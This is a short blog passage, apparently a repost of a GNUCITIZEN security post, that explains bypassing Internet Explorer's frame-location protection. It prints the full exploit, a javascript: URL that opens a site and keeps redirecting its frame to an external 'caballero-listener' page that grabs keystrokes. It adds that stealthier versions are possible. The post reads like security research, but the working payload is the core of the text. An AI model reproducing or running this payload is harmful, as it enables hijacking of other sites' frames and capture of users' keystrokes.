This way, we bypass IE’s protection and set our desired location without any problems. And the final exploit goes like this:
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return 'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);What caballero-listener does is just focusing itself, so it can catches onkeydown events.. there are a lot of ways of making the same thing in more stealth mode.
Ghost Busters | GNUCITIZEN
Vi fornisco direttamente il digest ;)
0 Comment:
Posta un commento